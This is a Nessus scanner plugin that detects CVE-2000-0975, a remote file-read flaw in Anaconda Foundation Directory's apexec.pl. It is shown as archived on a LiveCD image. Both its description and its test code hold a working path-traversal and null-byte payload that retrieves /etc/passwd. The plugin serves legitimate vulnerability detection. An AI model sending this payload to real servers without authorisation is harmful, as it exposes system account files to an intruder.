home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / anaconda.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  68 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10536);
  10.  script_bugtraq_id(2338);
  11.  script_version ("$Revision: 1.19 $");
  12.  script_cve_id("CVE-2000-0975");
  13.  
  14.  name["english"] = "Anaconda remote file retrieval";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. The remote Anaconda Foundation Directory contains a flaw
  19. that allows anyone to read arbitrary files with root (super-user) 
  20. privileges, by embedding a null byte in a URL, as in :
  21.  
  22. http://www.YOURSERVER.com/cgi-bin/apexec.pl?etype=odp&template=../../../../../../..../../etc/passwd%00.html&passurl=/category/
  23.  
  24. Solution : Contact your vendor for updated software.
  25.  
  26. Risk factor : High";
  27.  
  28.  script_description(english:desc["english"]);
  29.  
  30.  summary["english"] = "Anaconda Foundation Directory remote file retrieval";
  31.  script_summary(english:summary["english"]);
  32.  
  33.  script_category(ACT_GATHER_INFO);
  34.  
  35.  
  36.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison");
  37.  family["english"] = "Remote file access";
  38.  family["francais"] = "AccΦs aux fichiers distants";
  39.  script_family(english:family["english"], francais:family["francais"]);
  40.  script_dependencie("find_service.nes", "http_version.nasl");
  41.  script_require_ports("Services/www", 80);
  42.  exit(0);
  43. }
  44.  
  45. #
  46. # The script code starts here
  47. #
  48. include("http_func.inc");
  49. include("http_keepalive.inc");
  50.  
  51.  
  52. port = get_http_port(default:80);
  53.  
  54. if(!get_port_state(port))exit(0);
  55.  
  56. foreach dir (cgi_dirs())
  57. {
  58.   item = string(dir,"/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%00.html&passurl=/category/");
  59.   buf = http_get(item:item, port:port);
  60.   rep = http_keepalive_send_recv(port:port, data:buf);
  61.   if( rep == NULL ) exit(0);
  62.   if(egrep(pattern:".*root:.*:0:[01]:.*", string:rep))
  63.       {
  64.       security_hole(port);
  65.     exit(0);
  66.     }
  67. }
  68.